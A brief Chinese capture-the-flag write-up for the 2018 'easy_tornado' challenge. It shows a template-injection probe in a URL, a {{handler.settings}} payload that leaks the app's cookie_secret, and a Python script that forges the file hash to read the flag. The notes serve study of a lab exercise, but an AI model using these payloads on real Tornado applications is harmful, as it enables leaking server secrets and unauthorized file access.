模版注入 + tornado模板
{{ }}(要用在传参里面)
输入 http://61.147.171.105:64616/file?filename=/hints.txt&filehash={{2*3}},跳转到另一个页面。
{{ }}有回显,一般存在模版注入。msg=输入什么显示什么---》tornado模板
知识点
handler.settings:可以把它理解为 tornado 模板中内置的环境配置信息名称,通过handler.settings 可以访问到环境配置的一些信息。
看到 tornado 模板基本上就用 handler.settings。
?msg={{handler.settings}}
得到cookie_secret。
[护网杯 2018]easy_tornado 1(两种解法!)-CSDN博客
第二种方法:用脚本
import hashlib #选用哈希模块
filename = '/fllllllllllllag' #文件名
cookie_secret = '76fc62a3-fea5-46ab-8f95-4b7262246f8c'#cookie_secret值
filename = hashlib.md5(filename.encode()).hexdigest()#/fllllllllllllag进行32位小写哈希md5加密
a = cookie_secret + filename#md5值进行拼接
filehash = hashlib.md5(a.encode()).hexdigest()#计算拼接后的md5值的md532小写的值
print(filehash)#输出加密后的md532位小写的值